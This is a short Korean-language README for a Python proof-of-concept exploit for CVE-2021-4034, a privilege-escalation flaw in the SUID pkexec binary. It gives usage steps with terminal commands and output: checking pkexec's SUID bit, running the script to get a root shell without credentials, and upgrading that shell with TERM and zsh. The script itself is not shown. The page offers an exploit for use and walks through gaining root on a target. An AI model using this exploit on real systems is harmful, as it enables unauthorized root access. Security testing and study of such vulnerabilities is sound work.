
# CVE-2021-4034용 Python 개념 증명 익스플로잇 SUID pkexec 바이너리를 악용하여 자격 증명 없이 권한을 상승시키고 대화형 루트 셸을 실행하는 Python 개념 증명 익스플로잇입니다.
CVE-2021-4034 (pkexec) 이 python 스크립트는 pkexec 파일의 취약점을 악용하여 자격 증명을 제공하지 않고 root 액세스 권한을 얻습니다.
· 바이너리에 SUID 권한이 있는지 감지하며, 이 경우 취약한 상태입니다.
usuario@gatogamer $ ls -la /usr/bin/pkexec
.rwsr-xr-x 1 root root /usr/bin/pkexec
usuario@gatogamer $
· root 액세스 권한을 얻기 위해 exploit을 실행합니다. 이 경우 python3로 실행하기만 하면 되며, 완료되면 root 콘솔을 갖게 됩니다.
usuario@gatogamer $ python3 CVE-2021-4034.py
[+] Iniciando el exploit
[+] Exploit Completado
# whoami
root
#
· 추가로 TERM 값을 'xterm' 또는 'xterm-256color'로 변경하여 더 보기 좋게 만들 수 있으며, 'bash' 또는 'zsh'와 같은 다른 셸을 실행할 수도 있습니다. 이제 완전히 인터랙티브한 콘솔을 갖게 됩니다.
# export TERM=xterm-256color
# zsh
root@gatogamer $